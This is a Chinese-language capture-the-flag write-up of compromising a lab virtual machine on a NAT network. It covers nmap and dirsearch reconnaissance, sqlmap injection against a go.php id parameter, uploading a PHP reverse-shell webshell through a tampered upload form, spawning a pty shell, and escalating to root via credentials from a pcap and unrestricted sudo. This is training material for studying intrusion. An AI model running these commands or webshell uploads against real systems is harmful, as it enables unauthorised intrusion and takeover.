靶机设置
设置靶机为NAT模式
靶机IP发现
nmap 192.168.112.0/24
靶机IP为192.168.112.143
目录扫描
dirsearch 192.168.112.143
访问浏览器
提示让我们扫描更多的目录
换个更大的字典,扫出来一个 /nt4stopc/ 目录
目录拼接
拼接 /nt4stopc/
发现页面中有很多判断题
对为1,错为0
按顺序判断下来为 0110111001
拼接访问页面
SQL注入
点击网页发现存在id参数
尝试测试sql注入
python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 --batch
果然发现存在sql注入
python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 --dbs --batch
查看当前数据库
查看tatil表
python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 -D tatil --tables --batch
字段内容为 hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php
进行解码 uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas
再次拼接
再次拼接
拼接upload.php
发现文件上传点,但是没有提交按钮,自己添加一个
添加成功
getshell
kali生成反弹shell
locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
开启监听
上传文件
http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php
md5加密后访问文件
提权
生成交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
在 /var/www/html 下看见important.pcapng文件,查看他
发现有一个email信息
url解码后得到
email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it. Good work
账号: mkelepce
密码:mklpc-osas112.
登陆成功
sudo -l查看免密操作
发现可以进行任何操作
直接sudo su
提权成功
)
